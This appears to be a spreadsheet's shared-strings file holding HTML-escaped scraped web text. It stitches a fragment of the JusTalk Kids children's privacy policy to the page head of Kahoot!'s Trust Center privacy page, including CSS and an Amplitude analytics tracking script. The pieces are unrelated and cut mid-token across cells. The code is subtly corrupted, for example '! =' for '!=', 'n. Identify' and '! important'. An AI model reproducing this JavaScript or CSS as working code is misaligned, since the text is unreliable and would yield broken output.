                        and make suggestions as part of the&amp;nbsp;JusTalk&amp;nbsp;Kids experience. We also use the_x005F_x000D_
                        information to evaluate, improve, and create product features, conduct research to develop new_x005F_x000D_
                        products, and conduct audits and troubleshooting activities.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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 style="margin-left: 28.8pt;"&gt;&lt;span_x005F_x000D_
                        style="font-size: 1.25em;"&gt;●&amp;nbsp;&amp;nbsp;&lt;b&gt;Communicate.&lt;/b&gt;&amp;nbsp;We use the information we have_x005F_x000D_
                        to provide parents or guardians of children using&amp;nbsp;JusTalk&amp;nbsp;Kids with updates_x005F_x000D_
                        about&amp;nbsp;JusTalk&amp;nbsp;Kids (for example, when a new feature is available) and information_x005F_x000D_
                        about our policies, practices, and terms.</t>
  </si>
  <si>
    <t xml:space="preserve">We may also use this information to respond when_x005F_x000D_
                        parents or guardians contact us.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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 style="margin-left: 28.8pt;"&gt;&lt;span style="font-size: 1.25em;"&gt;●&amp;nbsp;&amp;nbsp;&lt;b&gt;Promote safety and_x005F_x000D_
                            security.&lt;/b&gt;&amp;nbsp;We use the information collected to help promote safety on and off_x005F_x000D_
                        the&amp;nbsp;JusTalk&amp;nbsp;Kids app, including to help verify accounts and activity, and to look into_x005F_x000D_
                        suspicious activity or violations of our terms or policies. We do this in a variety of ways,_x005F_x000D_
                        including through human staff, automated systems, and machine learning.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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 style="margin-left: 28.8pt;"&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_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 &lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="color: rgb(29, 33, 41); font-size: 1.25em;"&gt;&lt;b&gt;How is this information_x005F_x000D_
                            shared?&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt; &lt;/p&gt;_x005F_x000D_
                &lt;p&gt; &lt;/p&gt;_x005F_x000D_
                &lt;p&gt; &lt;/p&gt;_x005F_x000D_
                &lt;p&gt; &lt;/p&gt;_x005F_x000D_
                &lt;p&gt; &lt;/p&gt;_x005F_x000D_
  </t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en" class="page-template-default page page-id-57"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8" /&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
	&lt;meta name="google-site-verification" content="98uiE1NNtDmzt6ze17O0naCIZm99GcgkMqvsifyn_fQ" /&gt;
	&lt;link rel="shortcut icon" id="favicon" data-directory="https://trust.kahoot.com/wp-content/themes/kahoot-trust-portal/assets/img/" href="https://trust.kahoot.com/wp-content/themes/kahoot-trust-portal/assets/img/favicon/favicon.ico"/&gt;
	&lt;link rel="stylesheet" href="https://trust.kahoot.com/wp-content/themes/kahoot-trust-portal/assets/cssv/screen-3bdb06bc5b.css"&gt;
	&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
&lt;link rel="alternate" hreflang="de" href="https://trust.kahoot.com/de/privacy-policy/" /&gt;
&lt;link rel="alternate" hreflang="en" href="https://trust.kahoot.com/privacy-policy/" /&gt;
&lt;link rel="alternate" hreflang="es" href="https://trust.kahoot.com/es/privacy-policy/" /&gt;
&lt;link rel="alternate" hreflang="fr" href="https://trust.kahoot.com/fr/privacy-policy/" /&gt;
&lt;link rel="alternate" hreflang="it" href="https://trust.kahoot.com/it/privacy-policy/" /&gt;
&lt;link rel="alternate" hreflang="ja" href="https://trust.kahoot.com/ja/privacy-policy/" /&gt;
&lt;link rel="alternate" hreflang="nb" href="https://trust.kahoot.com/nb/privacy-policy/" /&gt;
&lt;link rel="alternate" hreflang="nl" href="https://trust.kahoot.com/nl/privacy-policy/" /&gt;
&lt;link rel="alternate" hreflang="pl" href="https://trust.kahoot.com/pl/privacy-policy/" /&gt;
&lt;link rel="alternate" hreflang="pt" href="https://trust.kahoot.com/pt/privacy-policy/" /&gt;
&lt;link rel="alternate" hreflang="tr" href="https://trust.kahoot.com/tr/privacy-policy/" /&gt;
	&lt;! -- This site is optimized with the Yoast SEO plugin v15.9.2 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy | Kahoot!</t>
  </si>
  <si>
    <t>Trust Center&lt;/title&gt;
	&lt;link rel="canonical" href="https://trust.kahoot.com/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy | Kahoot! Trust Center" /&gt;
	&lt;meta property="og:description" content="YouTube whose privacy notice is located at https://www.youtube.com/t/privacy" /&gt;
	&lt;meta property="og:url" content="https://trust.kahoot.com/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Kahoot! Trust Center" /&gt;
	&lt;meta property="article:publisher" content="https://www.facebook.com/getkahoot" /&gt;
	&lt;meta property="article:modified_time" content="2023-01-25T17:48:42+00:00" /&gt;
	&lt;meta property="og:image" content="https://trust.kahoot.com/files/2021/03/brooke-cagle-u-hv-rv-dr-7-pg-unsplash@3x.jpg" /&gt;
	&lt;meta property="og:image:width" content="900" /&gt;
	&lt;meta property="og:image:height" content="570" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:site" content="@getkahoot" /&gt;
	&lt;meta name="twitter:label1" content="Est.</t>
  </si>
  <si>
    <t>reading time"&gt;
	&lt;meta name="twitter:data1" content="1 minute"&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://trust.kahoot.com/#organization","name":"Kahoot","url":"https://trust.kahoot.com/","sameAs":["https://www.facebook.com/getkahoot","https://www.instagram.com/getkahoot/","https://www.linkedin.com/company/kahoot/","https://www.youtube.com/user/getkahoot","https://twitter.com/getkahoot"],"logo":{"@type":"ImageObject","@id":"https://trust.kahoot.com/#logo","inLanguage":"en-US","url":"https://trust.kahoot.com/files/2021/03/BrandAssets-Logo-CoverImage.png","width":1024,"height":576,"caption":"Kahoot"},"image":{"@id":"https://trust.kahoot.com/#logo"}},{"@type":"WebSite","@id":"https://trust.kahoot.com/#website","url":"https://trust.kahoot.com/","name":"Kahoot! Trust Center","description":"All of Kahoot!\u2019s key documents and policies in this handy hub!","publisher":{"@id":"https://trust.kahoot.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":"https://trust.kahoot.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://trust.kahoot.com/privacy-policy/#webpage","url":"https://trust.kahoot.com/privacy-policy/","name":"Privacy Policy | Kahoot! Trust Center","isPartOf":{"@id":"https://trust.kahoot.com/#website"},"datePublished":"2021-03-10T13:08:10+00:00","dateModified":"2023-01-25T17:48:42+00:00","breadcrumb":{"@id":"https://trust.kahoot.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://trust.kahoot.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://trust.kahoot.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"item":{"@type":"WebPage","@id":"https://trust.kahoot.com/","url":"https://trust.kahoot.com/","name":"Home"}},{"@type":"ListItem","position":2,"item":{"@type":"WebPage","@id":"https://trust.kahoot.com/privacy-policy/","url":"https://trust.kahoot.com/privacy-policy/","name":"Privacy Policy"}}]}]}&lt;/script&gt;
	&lt;!--</t>
  </si>
  <si>
    <t>/ Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//s.w.org'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t>
  </si>
  <si>
    <t>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42px;}.has-black-color{color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !</t>
  </si>
  <si>
    <t>important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) ! important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
&lt;/style&gt;
&lt;link rel='shortlink' href='https://trust.kahoot.com/?p=57' /&gt;
&lt;meta name="generator" content="WPML ver:4.4.10 stt:37,1,4,3,27,28,29,67,40,66,2,53;" /&gt;
		&lt;style type="text/css" id="wp-custom-css"&gt;
			.notification {  
    border-radius: 4px;
    padding: 8px 16px;
    text-align: center;
    background-color: #eee;
    margin: 0 auto;
		margin-bottom: 20px;
	}
.article-view__body table {
    border-top: 1px solid #CCCCCC;
    border-bottom: 1px solid #CCCCCC;
    margin-bottom:20px;
}
.article-view__body table td {
    padding: 20px;
    border-bottom: 1px solid #CCCCCC;
}
.article-view__body table td+td {
    border-left: 1px solid #CCCCCC;
}
.ot-scrn-rdr, 
.visually-hidden {
	border: 0;
	clip: rect(0 0 0 0);
	height: 1px;
	margin: -1px;
	overflow: hidden;
	padding: 0;
	position: absolute;
	width: 1px;
}
table.cookie-table {
   border: 1px solid #ccc;
   border-radius: 4px;
width: 100%;
max-width: 800px;
}
table.cookie-table td,
table.cookie-table th {
	font-size: 12px;
  text-align: left;
}
table.cookie-table td,
table.cookie-table th {
    padding: 4px 8px;
}
table.cookie-table th+th {
    border-left: 1px solid #CCCCCC;
}
table.cookie-table th {
	border-bottom: 1px solid #ccc;
}
table.cookie-table th:nth-of-type(1) {
width: 110px;
}
table.cookie-table th:nth-of-type(3) {
width: 90px;
}
		&lt;/style&gt;
	&lt;script type="text/javascript" data-ot-ignore&gt;
(function(e,t){var n=e.amplitude||{_q:[],_iq:{}};var r=t.createElement("script")
r.type="text/javascript";
r.integrity="sha384-5fhzC8Xw3m+x5cBag4AMKRdf900vw3AoaLty2vYfcKIX1iEsYRHZF4RLXIsu2o+F"
r.crossOrigin="anonymous";r.async=true;
r.src="https://cdn.amplitude.com/libs/amplitude-8.21.4-min.gz.js";
r.onload=function(){if(!e.amplitude.runQueuedFunctions){console.log(
"[Amplitude] Error: could not load SDK")}};var s=t.getElementsByTagName("script"
)</t>
  </si>
  <si>
    <t>[0];s.parentNode.insertBefore(r,s);function i(e,t){e.prototype[t]=function(){
this._q.push([t].concat(Array.prototype.slice.call(arguments,0)));return this}}
var o=function(){this._q=[];return this};var a=["add","append","clearAll",
"prepend","set","setOnce","unset","preInsert","postInsert","remove"];for(
var c=0;c&lt;a.length;c++){i(o,a[c])}n. Identify=o;var l=function(){this._q=[];
return this};var u=["setProductId","setQuantity","setPrice","setRevenueType",
"setEventProperties"];for(var p=0;p&lt;u.length;p++){i(l,u[p])}n. Revenue=l;var d=[
"init","logEvent","logRevenue","setUserId","setUserProperties","setOptOut",
"setVersionName","setDomain","setDeviceId","enableTracking",
"setGlobalUserProperties","identify","clearUserProperties","setGroup",
"logRevenueV2","regenerateDeviceId","groupIdentify","onInit","onNewSessionStart"
,"logEventWithTimestamp","logEventWithGroups","setSessionId","resetSessionId",
"getDeviceId","getUserId","setMinTimeBetweenSessionsMillis",
"setEventUploadThreshold","setUseDynamicConfig","setServerZone","setServerUrl",
"sendEvents","setLibrary","setTransport"];function v(t){function e(e){t[e
]=function(){t._q.push([e].concat(Array.prototype.slice.call(arguments,0)))}}
for(var n=0;n&lt;d.length;n++){e(d[n])}}v(n);n.getInstance=function(e){e=(
!e||e.length===0?"$default_instance":e).toLowerCase();if(
!Object.prototype.hasOwnProperty.call(n._iq,e)){n._iq[e]={_q:[]};v(n._iq[e])}
return n._iq[e]};e.amplitude=n})(window,document);
    function docReady(fn) {
        if (document.readyState === "complete" || document.readyState === "interactive") {
            setTimeout(fn, 1);
        } else {
            document.addEventListener("DOMContentLoaded", fn);
        }
    }  
    function getParameterByName(name) {
        name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
        var regex = new RegExp('[\\?&amp;]' + name + '=(</t>
  </si>
  <si>
    <t xml:space="preserve">[^&amp;#]*)'),
        results = regex.exec(location.search);
        return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
    }
    function decorateUrl(href, deviceId, sessionId) {
        var splitOnHash = href.split('#');
        var href = splitOnHash[0];
        var urlAppend = 'deviceId=' + deviceId;
        var urlSessionId = sessionId ? '&amp;sessionId=' + sessionId: '';
        var prepend = '';
        var hash = '';
        </t>
  </si>
  <si>
    <t>if (href.indexOf('?') ! = -1) {
            prepend = '&amp;';
        } else {
            prepend = '?';
        }
        if (splitOnHash.length &gt; 1) {
            hash = '#' + splitOnHash[1];
        }
        return href.replace(/\&amp;+/,'&amp;') + prepend + urlAppend + urlSessionId + hash;
    }
    function addParametersToUrl (index, el, instance) {
        el.addEventListener('click', function(){
        var urlPlusParams = decorateUrl(el.href, instance.options.deviceId, instance.getSessionId());
        el.href = urlPlusParams;
        });
    }
    function getTrackingContainer(e) {
        var result = null; // we only need a single item here, the first parent
        for (var p = e &amp;&amp; e.parentElement; p; p = p.parentElement) {
        var container = p.getAttribute('data-amplitude-link-position');
        if (container) {
            result = container;
        }
        }
        return result;
    }
    var AMPLITUDE_PROD = 'f4f55f73fbc8e071422c933108b66218';
    var AMPLITUDE_QA = '21f4703dee4bd6177fd067a4bd46704e';
    var amplitudeKey = AMPLITUDE_PROD;
    var deviceId = getParameterByName('deviceId') || null;
    var sessionId = getParameterByName('sessionId') || null;
    var cookieDomain</t>
  </si>
  <si>
    <t>{
        amplitudeKey = AMPLITUDE_QA;
    } 
    amplitude.getInstance().init(amplitudeKey, null, {
        saveEvents: true,
        disableCookies: true,
        includeUtm: true,
        includeReferrer: true,
        deviceId: deviceId,
        storage: 'sessionStorage' // 'localStorage'
    }, function(instance) {
        // Session timeout is 30 minutes (in milliseconds)
         var sessionMaxAge = 30 * 60 * 1000;
        // Persist session across domains, but only if the session hasn't timed out yet
        if (sessionId &amp;&amp; !isNaN(sessionId) &amp;&amp; (Number(sessionId) + sessionMaxAge) &gt; Date.now()) {
        instance.setSessionId(Number(sessionId));
        }
        // Cross domain link tracking
        var domain = getParameterByName('from').replace('create.', '') ||</t>
  </si>
  <si>
    <t>'kahoot.it';
        document.querySelectorAll('[href*="' + domain + '"]').forEach(( index, el ) =&gt; {
            addParametersToUrl(index, el, instance);
        });
        document.querySelectorAll('[href*="kahoot.com/register"]').forEach(( index, el ) =&gt; {
        addParametersToUrl(index, el, instance);
        });
    });
    var normaliseUrl = function(url) {
        return url ?</t>
  </si>
  <si>
    <t>url.split(/[?]/)[0].toLowerCase() : '';
    };
    var url = window.location +'';
    var pagePath = window.location.pathname;
    var pageViewProps =  {
        url: normaliseUrl(url) || null,
        page_path: normaliseUrl(pagePath) || null
    };
    pageViewProps['embed'] = getParameterByName('embed') || null;
    pageViewProps['ui_language'] = document.querySelector('html').getAttribute('lang') || null;
    pageViewProps['viewport_width'] = window.innerWidth || null;
    pageViewProps['viewport_height'] = window.innerHeight || null;
    amplitude.getInstance().logEvent("[Website] Pageview", pageViewProps);
    docReady(function() {
        document.querySelectorAll('a, button').forEach(el=&gt;{
            el.addEventListener('click', (el)=&gt;{
                var EventName = '[Website] Click Link';
                var props = pageViewProps; 
                props['click_text'] = el.target.innerText;
                props['link_position'] = getTrackingContainer(el.target);
                if (el.tagName == 'BUTTON') { EventName = '[Website] Click Event'; }
                if(amplitude) {  
                    amplitude.getInstance().logEvent(EventName, props);
                }
            });
        });
    });
&lt;/script&gt;&lt;/head&gt;
&lt;body id="top" itemscope itemtype="http://schema.org/WebPage"&gt; 
&lt;div class="header-wrap"&gt;
	&lt;header id="page-header-id" class="page-header " role="banner" itemscope itemtype="http://schema.org/WPHeader" data-amplitude-link-position="header"&gt;
		&lt;div class="page-header__inner"&gt;
			&lt;a href="#main" id="skip-to-content"&gt;Skip to Page content&lt;/a&gt; 
				&lt;a href="/" title="Link to kahoot.com homepage" aria-label="Link to kahoot.com homepage" class="logo-link"&gt;
					&lt;svg width="24" height="25" viewBox="0 0 30 32" class="k-logo"&gt;
						&lt;title&gt;K!&lt;/title&gt;
						&lt;g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"&gt;
							&lt;path d="M0,3.12411067 L5.3201581,1.75968379</t>
  </si>
  <si>
    <t>L5.30711462,12.5774704 L14.2901186,3.91304348 L18.9106719,5.68853755 L12.3814229,12.9316206 L16.7118577,28.7075099 L12.013834,28.7075099 L8.5486166,16.6209486 L5.27588933,19.8256917 L5.3201581,28.7075099 L0,28.5173913</t>
  </si>
  <si>
    <t>L0,3.12411067 Z M22.8873518,29.9964427 L24.2067194,26.8901186 L27.2715415,26.8901186 L28.4312253,30.2988142 L25.6794466,31.944664 L22.8873518,29.9964427 Z M29.8806324,1.81146245 L26.2513834,25.1272727 L20.4770751,-1.77635684e-15 L29.8806324,1.81146245 Z" fill="#46178F"&gt;&lt;/path&gt;
						&lt;/g&gt;
					&lt;/svg&gt;
				&lt;svg width="146" height="50" viewBox="0 0 88 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" class="kahoot-logo"&gt;
					&lt;title&gt;Kahoot!&lt;/title&gt;
					&lt;g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"&gt;
						&lt;path d="M59.4563337,25.5366087 C55.5222657,25.9279665 52.3340315,22.7810536 52.3340315,18.5078772 C52.3340315,14.2343593 55.3409298,10.8227848 59.0502914,10.8886941 C62.75897,10.9535789 65.9482288,14.1004918 66.1725936,17.9174256 C66.3969584,21.7336764</t>
  </si>
  <si>
    <t>63.3900601,25.1449094 59.4563337,25.5366087 Z M37.7762727,17.5267508 C38.000979,13.7101585 41.1895547,10.5635871 44.8985748,10.4980193 C48.6075949,10.432793 51.6144932,13.8443675</t>
  </si>
  <si>
    <t>51.6144932,18.1175439 C51.6144932,22.3910618 48.426259,25.5379747 44.4921911,25.1466169 C40.5584646,24.7552591</t>
  </si>
  <si>
    <t>37.5519078,21.3436845 37.7762727,17.5267508 Z M0,4.88343502 L4.5965759,3.70458064 L4.58530644,13.0510655 L12.3465531,5.56506693 L16.3386759,7.09908023 L10.6974547,13.3570485 L14.4389172,26.9872962 L10.3798607,26.9872962 L7.38593935,16.5445998</t>
  </si>
  <si>
    <t>L4.55832802,19.3134733 L4.5965759,26.9872962 L0,26.8230352</t>
  </si>
  <si>
    <t>L0,4.88343502 Z M37.6004007,25.5065568 L33.5642246,25.5065568 L33.2999044,19.2940078 L32.9249385,14.8756944 C32.8310263,11.7779574 30.0375649,12.5644295 29.1920135,12.9383708 L29.4153538,25.5065568 L25.5584646,25.3730307 L24.9314725,1.04942628 L28.859735,-7.10542736e-15 L28.9485247,9.84029232 C33.2203351,8.47600401 35.5076951,8.49068846 36.0820963,14.7650487 L37.6004007,25.5065568 Z M81.0803889,28.3167517 L82.2203124,25.6329114 L84.8682952,25.6329114 L85.8702532,28.5779984 L83.4927375,30 L81.0803889,28.3167517 Z M66.1087333,13.4960386 L65.4479328,8.93088061 L68.8776068,9.05040525 L68.8817048,2.6397869</t>
  </si>
  <si>
    <t>L71.9480239,3.91084601 L71.8944085,9.60158456 L76.301794,9.89220016 L76.301794,12.6552682 L71.9958337,12.896025 L72.3567981,21.3057782 C72.3567981,21.3057782 72.3656771,21.9635051 73.7135734,21.9635051 C75.0611283,21.9635051 76.301794,21.2224524 76.301794,21.2224524 L76.301794,25.5113378 C76.3605318,26.8148393 74.518828,27.3667016 74.518828,27.3667016 C68.631386,28.2607458 69.0637237,24.3543393 69.0637237,24.3543393 L68.8721428,13.4960386 L66.1087333,13.4960386 Z M87.1225298,3.96514434 L83.9868864,24.1098261 L78.9979282,2.40005464 L87.1225298,3.96514434 Z M16.4390766,12.8263592 L15.3626719,9.98577088 C15.3626719,9.98542938 23.2198798,6.47345415 24.1552454,12.7758173 L24.0418678,26.3176168 L18.0772471,26.3169338 C18.0772471,26.3169338 15.4593161,26.417676 14.6540616,23.4971769 C14.6540616,23.4971769 12.6409252,16.0559148 20.5961433,14.6455241 L20.6169748,12.8325061 C20.6169748,12.8325061 19.1085739,11.2045806 16.4390766,12.8263592 Z M56.3920636,18.7834669 C56.560081,20.7604043</t>
  </si>
  <si>
    <t>57.7846963,21.838175 58.5892678,21.9331117 C60.6290411,22.1738685 62.3652217,20.3082597</t>
  </si>
  <si>
    <t>62.2491121,17.933476 C62.132661,15.5583508 61.1836354,14.0738548 59.2592888,14.0332165 C57.3363082,13.9925781 56.1724797,16.2010518 56.3920636,18.7834669 Z M20.5876059,23.7266642 L20.6962025,17.6636918 C17.445474,17.1913988 17.3846872,21.5909298 17.3846872,21.5909298</t>
  </si>
  <si>
    <t>C17.7022812,24.4335671 20.5876059,23.7266642 20.5876059,23.7266642 Z M45.3595984,21.5431199 C46.1641699,21.4481832 47.3887852,20.3704125 47.5564612,18.3934751 C47.7763865,15.81106 46.6128996,13.6025863 44.6895775,13.6432247 C42.7652309,13.6835215</t>
  </si>
  <si>
    <t>41.8158638,15.168359 41.7000956,17.5434842 C41.583303,19.9179264 43.3194837,21.7838767 45.3595984,21.5431199 Z" fill="#46178F"&gt;&lt;/path&gt;
					&lt;/g&gt;
				&lt;/svg&gt;
			&lt;/a&gt;
			&lt;nav id="header-menu" class="header-menu" aria-label="Navigation" itemscope itemtype="https://schema.org/SiteNavigationElement"&gt;
			&lt;ul id="primary-website-nav" class="header-menu-left first-in-focus"&gt;&lt;li id="menu-item-124" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-124"&gt;&lt;a href="https://kahoot.com/" itemprop="url"&gt;Go back to kahoot.com&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-150" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-150"&gt;&lt;a href="https://kahoot.com/contact/" itemprop="url"&gt;Contact us ❐&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;							&lt;div class="language-selector"&gt;
					&lt;button class="language-selector-toggle" data-action="openLanguageMenu"&gt;EN&lt;/button&gt;
&lt;div class="wpml-ls-statics-shortcode_actions wpml-ls wpml-ls-legacy-list-horizontal"&gt;
	&lt;ul&gt;&lt;li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-de wpml-ls-first-item wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/de/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native" lang="de"&gt;Deutsch&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket "&gt; (&lt;/span&gt;German&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-en wpml-ls-current-language wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native"&gt;English&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;li</t>
  </si>
  <si>
    <t>class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-es wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/es/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native" lang="es"&gt;Español&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket"&gt; (&lt;/span&gt;Spanish&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-fr wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/fr/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native" lang="fr"&gt;Français&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket"&gt; (&lt;/span&gt;French&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-it wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/it/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native" lang="it"&gt;Italiano&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket"&gt; (&lt;/span&gt;</t>
  </si>
  <si>
    <t>Italian&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-ja wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/ja/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native" lang="ja"&gt;日本語&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket"&gt; (&lt;/span&gt;Japanese&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-nb wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/nb/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native" lang="nb"&gt;Norsk&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket"&gt; (&lt;/span&gt;Norwegian&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;li</t>
  </si>
  <si>
    <t>class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-nl wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/nl/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native" lang="nl"&gt;Nederlands&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket"&gt; (&lt;/span&gt;Dutch&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-pl wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/pl/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native" lang="pl"&gt;Polski&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket"&gt; (&lt;/span&gt;Polish&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-pt wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/pt/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native" lang="pt"&gt;Português&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket"&gt; (&lt;/span&gt;Portuguese&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;li</t>
  </si>
  <si>
    <t>class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-tr wpml-ls-last-item wpml-ls-item-legacy-list-horizontal"&gt;
				&lt;a href="https://trust.kahoot.com/tr/privacy-policy/" class="wpml-ls-link"&gt;
                    &lt;span class="wpml-ls-native" lang="tr"&gt;Türkçe&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket"&gt; (&lt;/span&gt; Turkish&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
			&lt;/li&gt;&lt;/ul&gt;
&lt;/div&gt;
				&lt;/div&gt;
							&lt;button class="navigation-toggle desktop-hidden first-in-focus" aria-controls="menu-header-menu" aria-label="Open navigation"&gt;
					&lt;svg version="1.1" id="burger-icon-new" class="burger-icon" width="20px" height="14px" viewBox="0 0 20 14"&gt;
						&lt;rect x="0" y="0" width="18" height="2" class="icon-bar icon-bar--top"/&gt;
						&lt;rect x="0" y="6" width="18" height="2" class="icon-bar icon-bar--middle"/&gt;
						&lt;rect x="0" y="12" width="18" height="2" class="icon-bar icon-bar--bottom" /&gt;
					&lt;/svg&gt;
					&lt;svg xmlns="http://www.w3.org/2000/svg" class="nav-arrow-icon" width="14" height="19" viewBox="0 0 14 19"&gt;
						&lt;polygon fill="#000" fill-rule="evenodd" points="350.707 19 344 25.707 345.414 27.121 349.707 22.828 349.707 37.414 351.707 37.414 351.707 22.828 356 27.121 357.415 25.707" transform="translate(-344 -19)"/&gt;
					&lt;/svg&gt;
				&lt;/button&gt;
			&lt;/nav&gt;
        &lt;/div&gt;
    &lt;/header&gt;
&lt;/div&gt;&lt;!--/header-wrap--&gt;
&lt;main id="main" class="page"&gt;
	&lt;section class="page-section"&gt; 
&lt;div class="outer"&gt;
	&lt;div class="inner"&gt;
&lt;div class="article-view"&gt;
